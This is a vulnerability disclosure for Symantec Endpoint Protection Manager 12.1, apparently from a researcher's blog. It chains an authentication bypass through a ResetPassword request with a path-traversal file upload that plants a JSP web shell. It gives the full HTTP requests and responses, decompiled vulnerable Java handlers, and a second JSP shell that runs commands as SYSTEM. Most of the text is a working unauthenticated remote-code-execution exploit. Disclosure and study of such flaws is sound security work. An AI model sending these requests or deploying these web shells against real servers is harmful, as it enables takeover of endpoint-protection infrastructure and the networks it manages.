SYM15-007: Symantec Endpoint Protection 12.1 (http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html)

BinaryFile_request

POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/exec.jsp&KnownHosts=. HTTP/1.1
Host: 192.168.40.133:8443
Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40
Content-Length: 124

<%=new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\\A").next()%>

BinaryFileHandler_handleRequest.java

/*     */   public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/*     */   {
/*  54 */     NodeList list = doc.getElementsByTagName("Response");
/*  55 */     Element root = (Element)list.item(0);
/*  56 */     String action = (String)requestData.get("Action");
/*  57 */     String id = (String)requestData.get("GUID");
/*  58 */     String fileType = (String)requestData.get("FILE_TYPE");
/*  59 */     String newId = (String)requestData.get("NEW_GUID");
/*     */
/*  60-187 skipped */
/*     */
/* 189 */       if (action.equalsIgnoreCase("UploadPackage")) {
/* 190 */         String fileName = (String)requestData.get("PackageFile");
/* 191 */         String dirName = (String)requestData.get("KnownHosts");
/*     */         
/* 193 */         this.packageTempPath = (ScmProperties.getServerHome() + ConstantValue.TEMP_PACKAGE_RELATIVE_PATH);
/*     */         
/*     */ 
/* 196 */         if ((dirName != null) && (dirName.length() > 0) && (!dirName.contains("/")) && (!dirName.contains("\\"))) {
/* 197 */           this.packageTempPath = (this.packageTempPath + File.separator + dirName);
/*     */         }
/* 199 */         String path = this.packageTempPath + File.separator + fileName;
/* 200 */         FileOutputStream fos = null;
/* 201 */         BufferedOutputStream bos = null;
/* 202 */         Object is = null;
/* 203 */         BufferedInputStream bis = null;
/*     */         
/* 205 */         File folder = new File(this.packageTempPath);
/* 206 */         if (!folder.exists()) {
/* 207 */           if (!folder.mkdirs()) {
/* 208 */             root.setAttribute("ResponseCode", String.valueOf(303169573));
/*     */           }
/*     */         }
/*     */         else {
/*     */           try
/*     */           {
/* 214 */             Utility.emptyDir(folder.getCanonicalPath(), false);
/*     */           } catch (IOException e) {
/* 216 */             ServerLogger.log(this, e);
/* 217 */             root.setAttribute("ResponseCode", String.valueOf(303169573));
/*     */             
/* 219 */             return;
/*     */           }
/*     */         }
/*     */         
/* 223 */         byte[] buf = new byte[1024];
/* 224 */         int read = 0;
/*     */         try
/*     */         {
/* 227 */           is = new BufferedInputStream(requestData.getInputStream());
/* 228 */           fos = new FileOutputStream(path);
/* 229 */           bos = new BufferedOutputStream(fos);
/* 230 */           bis = new BufferedInputStream((InputStream)is);
/* 231 */           while ((read = bis.read(buf)) > 0) {
/* 232 */             bos.write(buf, 0, read);
/*     */           }
/* 234 */           bos.flush();
/* 235 */           root.setAttribute("ResponseCode", String.valueOf(0));
/*     */         } catch (IOException ex) {
/* 237 */           ServerLogger.log(this, ex);
/* 238 */           root.setAttribute("ResponseCode", String.valueOf(303169573));
/*     */         }
/*     */         finally
/*     */         {
/* 242 */           IOUtilities.closeInputStream((InputStream)is);
/* 243 */           IOUtilities.closeInputStream(bis);
/* 244 */           IOUtilities.closeOutputStream(fos);
/* 245 */           IOUtilities.closeOutputStream(bos);
/*     */         }
/*     */         
/* 247-328 skipped */
/*     */         
/*     */       }
/*     */   }

ResetPassword_request

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

ActionType=ResetPassword&UserID=admin&Domain=

ResetPassword_response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40; Path=/; Secure; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/xml;charset=UTF-8
Date: Tue, 30 Jun 2015 11:19:30 GMT
Server: SEPM
Content-Length: 971

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<Response ResponseCode="-2130181964">
  <ReportingElement>&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;&#13;
&lt;ReportingInfo AdminType="0" AllowCollectFileFingerprintList="1" AllowDeleteFromQuarantine="1" AllowDisableDownloadAdvisor="1" AllowDisableNetworkThreatProtect="1" AllowEnableAutoProtect="1" AllowEnableDownloadAdvisor="1" AllowEnableNetworkThreatProtect="1" AllowPowerEraserScan="1" AllowRestartComputers="1" AllowScan="1" AllowUpdateContent="1" AllowUpdateContentScan="1" AllowedDomains="" ChangePwd="0" ComplianceOnly="0" ComputerIPs="" ComputerNames="" DateFormat="M/d/yy" DisallowedCentralizedExceptions="0" FullAccessGroupList="" GroupWhiteList="" IsStoredProcedureValid="0" KICKOUTTIME="3600000" Lang="en_US" LastLoginTime="1435663154502" LegacyDomains="" LegacyGroups="" Role="1" Servers="" Session="625B492F4B9B6DA96B5E0C70A8A72F40"/&gt;&#13;
</ReportingElement>
</Response>

ResetPasswordHandler_getCredential.java

/*     */   protected AdminCredential getCredential(RequestData requestData, ConsoleSession session) throws ServerException
/*     */   {
/* 367 */     session = session.getNewSession();
/* 368 */     AdminCredential credential = doGetAdminCredentialWithoutAuthentication();
/* 369 */     session.setAdminCredential(credential);
/* 370 */     return credential;
/*     */   }

ResetPasswordHandler_handleRequest.java

/*     */   public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/*     */   {
/*  72 */     this.requestData = requestData;
/*  73 */     String userName = (String)requestData.get("UserID");
/*  74 */     String domainName = (String)requestData.get("Domain");
/*     */ 
/*  76 */     NodeList list = doc.getElementsByTagName("Response");
/*  77 */     Element root = (Element)list.item(0);
/*     */     try
/*     */     {
/*  80 */       if (!isValidRequestWithinGivenInterval(requestData.getRemoteIP())) {
/*  81 */         throw new ServerException(-2130182144, 186);
/*     */       }
/*     */ 
/*  84 */       checkIfSiteCanRecoverPasswords();
/*  85 */       init();
/*     */ 
/*  87 */       if ((this.sRecipient == null) || (this.sRecipient.length() == 0) || (" ".equals(this.sRecipient))) {
/*  88 */         ServerLogger.log(Level.INFO, "Problem with Mail server Configuration");
/*  89 */         throw new ServerException(-2130182144, 179);
/*     */       }
/*     */ 
/*  92 */       AdminCredential credential = getCredential(requestData, session);
/*     */ 
/*  94 */       if ((credential != null) && (credential.getAdminID() != null)) {
/*  95 */         Integer mode = credential.getOptAuthenticationMethod();
/*  96 */         if ((mode != null) && (SemAdministrator.DEFAULT.intValue() != mode.intValue())) {
/*  97 */           ServerLogger.log(Level.INFO, "Particular admin named " + credential.getAdminName() + " is not at Symantec authentication mode. Failed to reset password.");
/*     */ 
/* 100 */           throw new ServerException(-2130182144, 191);
/*     */         }
/*     */ 
/*     */       }
/*     */ 
/* 106-137 skipped */
/*     */ 
/*     */     }
/*     */     catch (ServerException e) {
/* 142 */       root.setAttribute("ResponseCode", "" + (e.getErrorCode() | e.getMessageId()));
/*     */     }
/*     */   }

system_exec.jsp

<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%
	try {
		out.print(SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", request.getParameter("cmd"))));
	} catch (Exception e) {
	}
%>